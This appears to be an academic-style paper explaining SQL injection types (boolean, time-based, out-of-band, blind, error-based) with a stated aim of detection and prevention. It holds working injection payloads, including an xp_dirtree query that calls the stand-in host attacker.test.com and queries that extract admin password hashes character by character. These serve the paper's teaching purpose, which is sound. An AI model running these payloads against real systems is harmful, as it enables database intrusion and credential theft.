SQL Injection Attack and Detection using Hybrid Algorithm

1. Introduction
SQL Injection is one of the vulnerabilities in OWASP’s Top Ten List for Web Based Application Exploitation. It is one of the most common strategies employed by attackers to steal identity and other sensitive information from Web Sites. In web based security problems, SQL injection attack has the top most priority. We have classified SQL Injection attacks into three main types: 1)Based on Errors and Warnings 2)Blind SQL Injection 3)Modification of Queries. And all these three techniques are implemented by automation tools(such as SQLMAP), manually, or by tricky programs created by hackers. Attackers try to find out information about database using errors and warnings displayed on supplying attack patterns and unsafe queries to the database. And after finding out about database name and version and other basic information, attackers can then proceed with the attack patterns by modifying legitimate queries to make it unsafe and vulnerable to discover the database table information and use it for harmful means. If display of errors and warnings are kept off on a website then attackers can make use of Blind SQL Injection by asking true and false questions from the database and based on response we conclude whether web page is vulnerable or not. If a website is not displaying errors and warnings on using SQL control statements and special characters, it doesn’t mean that the website is not vulnerable. We can use Blind SQL Injection in such case, where we ask database true and false questions and based on the response we can conclude if its secure or not. Currently we have so many existing tools and methodologies available to check whether a web page is vulnerable or not and exploit those vulnerabilities if they exist. Many tools and algorithms have been proposed to detect SQL Injection Vulnerabilities and attack pattern and many approaches have been suggested to improve the available web codes. The SQLIA’s are widespread attacks on the websites which are followed by the XSS(Cross Site Scripting) attack. For websites fields without proper input validation, an attacker could obtain direct access to the database of the underlying application. Defensive coding has been offered as a solution by many for preventing the SQLIAs , although developers try to put some controls in their source code, attackers continue to bring some new ways to bypass these controls. We have tried to come forward with a hybrid algorithm to attack vulnerable websites and then provide a detection and prevention algorithm.

1.1 Motivation
In spite so many security measures taken to protect the systems, they are still vulnerable and can be hacked remotely. The hackers take advantage of the loopholes and flaws in a system, i.e., they exploit the vulnerabilities of the attack prone systems. So, it is not just a need of hour but critically important to eliminate the weak links in a system and make it more secure. This can be achieved by following the guidelines for secure coding, vulnerability assessment of the system, and understanding the mechanism a black hat hacker perform and the ways in which a hacker can get into a system. Learning and implementing different hacking techniques can help in finding and fixing different security glitches. It may help in anticipating security flaws in a system. Learning about different techniques that hackers use to infiltrate into a system can help resolve the issues before they cause severe damage to it. Since SQL Injection is one of the serious web security threat at present. So, its important to know about vulnerable web pages and flaws in the developer codes. Through web page penetration testing , we come to know about loopholes in the system, and then its rectified later to make it attack free. Hence, the main motive behind research in this topic is to know about the methods to attack a web page however secure it is, and then find out the vulnerabilities that makes it attack prone and then finally eliminate those by adopting secure and strong coding techniques and practices. Its not just about knowing the existing methods but also to devise new methods, algorithms and approaches to find more effective and efficient solutions which could make our systems more strong and attack free.

2. Related Work
Several researchers have undertaken the challenge of developing an automation script to find vulnerable web pages along with their vulnerabilities to make us aware about the extent to which hackers can think and find out ways to attack and break into the secure systems and so far, many researches have been conducted in this domain to make our internet and related applications secure and attack free. Some researchers have suggested encryption of user name, password and other details, some have also suggested use of ASCII characters for encoding of user details.Some have suggested static methods, some have suggested dynamic and some also came up with the idea of combination of static and dynamic methods. Many tools have also been developed to exploit the vulnerabilities of the web pages. One of the researchers proposed a model using data mining technique to mine database logs to form user profiles that can model normal behaviours and identify anomalous transaction in database. So, the system was able to identify behaviours that are different from normal behaviour. Bandhakavi proposed a misuse detection technique to detect SQLIA by discovering the intent of a query dynamically and then comparing the structure of the identified query with normal query.Another technique used for the same known as static Anomaly detection using Aho-Corasick Pattern matching algorithm.

The algorithms and models proposed and implemented so far have few disadvantages, they consume a lot of memory , or they are slow and less efficient and some are not even user friendly and others donot look at all the perspectives while proposing a solution. In this research project we have tried to cope up with all these disadvantages by our new hybrid algorithms which takes into account most of the effective solutions and models that have been proposed so far.

3. SQL Injection
SQL Injection is a subset of unverified/unsanitized user input vulnerability, and the idea is to convince the application to run SQL Queries which are unsafe so that database information can be leaked. The login page had a traditional username and password fields for signin into the webpage, and when unsafe user input is provided, it results in displaying Database errors and warnings which is further used to attack the website. SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true. It takes advantage of the design flaws in poorly designed web applications to exploit SQL statements to malicious SQL code. The attack works on dynamic SQL statements. A dynamic statement is a statement that is generated at run time using parameters password from a web form or URI query string. The attacker injects arbitrary data, most often a database query, into astring that’s eventually executed by the database through a web application(e.g. a login form). Through SQL Injection attacker can obtain unauthorized access to database and can create, read, update, alter, or delete data stored in the back-end database. Currently, almost all SQL databases such as Oracle, MySQL, PostgreSQL, MSSQL Server, MS Access are potentially vulnerable to SQL injection attacks. In its most common form, a SQL injection attack gives access to sensitive information such as social security numbers, credit card number or other financial data.

Why SQL injection?
-Identify injectable parameters.
-Identify the database type and version
-Discover database schema
-Extracting data
-Insert,modify or delete data
-Denial of service to authorized users by locking or deleting tables.
-Bypassing authentication
-Privilege escalation
-Execute remote commands by calling stored functions within the DBMS which are reserved for administrators
-Allows attackers to spoof identity, tamper with existing data, cause repudiation issues sucha as voiding transactions or changing balances
-Allows the complete disclosure of all data on the system

SQL Injection Method:
The below mentioned methods are used for SQL Injection into vulnerable systems:
-Injected through user input
-Injection through Server Variables
-Injection through cookie fields contains attack strings
-Second-Order Injection where hidden statements to be executed at another time by another function.
4. SQL Injection Classification:
4.1. Boolean-Based SQL Injection: It requires an attacker to send a series of Boolean queries to the database server and analyze the results in order to infer the values of any given field. If we want to find out the username of a field that is vulnerable to blind injection, then we need to understand about few important functions:
ASCII(character)
Substring(string,start,length)
Length(string)
Through the use of these functions, we can begin testing for the value of the first character, and once we find the first one, we can move on to the next one, and so on and so forth, until the entire username is discovered.
SELECT * FROM Users WHERE UserID = ‘1’ AND ASCII(SUBSTRING(username,1,1)) = 97 AND ‘1’ = ‘1’

Here, substring() takes the first character of the username string and limits the length to 1;This way we can go through each character aone at a time. Next, the ASCII() function runs with the character we just got as its parameter. The rest of the statement is basically just a conditional that reads: if the ASCII value of this character is equal to 97 (which is “a”), and 1=1 is true (which it always is), then the whole statement is true and we have the right character. If this returns false, then we can increment the ASCII value from 97 to 98, and repeat the process until it returns true. In order to be certain that our tests are really returning true, we need a way to differentiate between true values and false values. This can be accomplished by utilizing the following query, which will always return false:
SELECT * FROM Users WHERE UserID = ‘1’ AND ‘1’ = ‘2’
Now we can use this as the baseline for false responses, and compare this to our Boolean injections. If the response from the server is different than this baseline, we can be reasonably confident we have obtained a true value. The final thing that needs to be done when testing for Boolean-based injection is determining when to stop, that is, knowing the length of the string. Once we reach a null value (ASCII code 0), then we are either done and have discovered the entire string or the string itself contains a null value. We can figure this out by using the LENGTH() function. Let’s say the username we were trying to obtain was “jsmith,” then the query could look like this:
SELECT * FROM Users WHERE UserID = ‘1’ AND LENGTH(username) = 6 AND ‘1’ = ‘1’
If this returns true, then we have successfully identified the username. If this returns false, then the string contains a null value and we would need to continue the procedure until another null character is discovered.

4.2. Time Based SQL Injection: Time-based SQL injection involves sending requests to the database and analyzing server response times in order to deduce information. We can do this by taking advantage of sleep and time delay functions that are utilized in database systems. Like before, we can use the ASCII() and SUBSTRING() functions to aid in enumerating a field along with a new function called SLEEP(). Let’s examine the following MySQL query sent to the server:
SELECT * FROM Users WHERE UserID = 1 AND IF(ASCII(SUBSTRING(username,1,1)) = 97, SLEEP(10), ‘false’)
The IF() function takes three parameters: the condition, what returns if the condition is true, and what returns if the condition is false. In this example, we are using the same method that we used for Boolean-based injections as the condition. The whole expression reads like so: if the first character in the username string is “a,” then sleep for ten seconds, otherwise return false. We can then increment the ASCII value until we receive a delayed response from the database, thus determining the correct characters in the username. It is important to choose a value in seconds that is long enough to differentiate between normal server response times.
MySQL also has a function called BENCHMARK() that can be used in time-based injection attacks. It takes the number of times to execute an expression as its first parameter and the expression itself as the second parameter. For example:
SELECT * FROM Users WHERE UserID = 1 AND IF(ASCII(SUBSTRING(username,1,1)) = 97, BENCHMARK(10000000, CURTIME()), ‘false’)
Basically, this states that if the first character of the username is “a”(97), then run CURTIME() ten million times. CURTIME() returns the current time, but the function that’s passed here doesn’t really matter; It is important, however, to make sure the function runs enough times to have a significant impact.

4.3. Out-of-Band SQL Injection: The third main category of SQL injection is out-of-band. These attacks work by retrieving information through alternative channels, such as emails, file systems, HTTP requests, or DNS resolutions. Out-of-band SQL injection is useful once all in-band and blind injection methods have been exhausted. Example:
http://exampleurl.com/product.php?id=1

And the resulting SQL Query looks like:
SELECT * FROM Products WHERE ProductID = 1;
Here is what the malicious request would look like in MS SQL:
SELECT * FROM Products WHERE ProductID = 1; EXEC master..xp_dirtree ‘\\attacker.test.com\’ —
The xp_dirtree stored procedure can be used to list directory contents, and in this example, attacker.test.com is a domain owned by the attacker. Using a stacked query, xp_dirtree executes, and a DNS lookup to attacker.test.com occurs. If the system is vulnerable, the attacker can check DNS logs and view the request.
4.4 Blind SQL Injections: In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.
A blind SQL injection vulnerability looks like the following:
global $wpdb; $title = $wpdb->get_var(“select post_title from ” . $wpdb->posts . ” where ID=” . $_GET’id’);
In the above example, raw unsanitized user input is sent directly to the database by concatenating the $_GET’id’ variable directly to the SQL query. To fix this vulnerability, you would simply use the prepare() method as above to sanitize and escape any database input.
The difference here is that the output is never sent to the browser. A blind SQLi vulnerability is just as serious as a regular SQLi vulnerability because an attacker can in some cases easily insert or update data in your database. The difference is that it becomes more difficult to extract data from the database because the attacker can’t see the output of the database because it is not written to the web browser.
Time based blind SQL attacks
There are generally two ways an attacker extracts data from a database using a blind SQL injection attack. The first is using a time based attack. Lets assume that, using the above SQLi vulnerability an attacker can send any command to the database, but they can’t see the output. They can only see the resulting web page.
An attacker might ask the database a question like “Does the first letter of the first admin account start with ‘a’? If it does, then sleep for 5 seconds and if it does not, don’t sleep at all. If it takes less than 5 seconds for the web page to be generated and return to the web browser, they know that the admin account does not start with the letter ‘a’ and they move on the the next letter, ‘b’ and ask the same question.
Using this technique, an attacker can launch a time based attack on a website and determine the names of admin accounts and they can extract hashed user passwords.
Content based blind SQL injection attacks
A content based blind SQL injection attack is another way for an attacker to extract data from a database when they can’t see the database output.
If the query generating the content is the following (remember, the query output is not sent to the user)
select post_status from wp_posts where ID=1
Lets assume that the value ‘1’ above is an unfiltered query parameter appended to the database query as in our above example. Thus an attacker can control all text after ‘ID=’. An attacker can append the following to the query to verify that if they include a false condition, they will see unusual content generated:
select post_status from wp_posts where ID=1 and 1=2 . 1 is obviously not equal to 2 so in the above query the database will return an empty result set. The attacker will examine the resulting page and if it is a page with no content or an error message saying something like ‘no content’, they will know what a response from an empty query with a false condition looks like.The attacker can then include something like the following:
select post_status from wp_posts where ID=1 and (select ID from wp_users where user_login=’admin’ and ID=1)
The above query will be empty if the user in the database with ID 1 does not have a username of ‘admin’. It will however return the a non-empty normal result to the browser if the user with ID 1 does have a username of ‘admin’. Using this technique an attacker can extract data from a database by checking for non-empty and empty responses from the application.
4.5 Error Based SQL Injection: In this method hackers can easily fetch details such as table names and content from visible database errors and this could be identified easily by hackers on the production servers. The best method here is to avoid displaying database error messages which in turn prevents hackers from fetching that information.
Another example of a content based blind SQL injection query is:

select post_status from wp_posts where ID=1 and (select 1 from wp_users where substring(user_pass,1,1) = ‘a’ and ID=1)
The above query will check if the first letter of the hashed password for user with ID 1 is an ‘a’. Using this technique, an attacker can go through every character and extract the hashed password for admin accounts.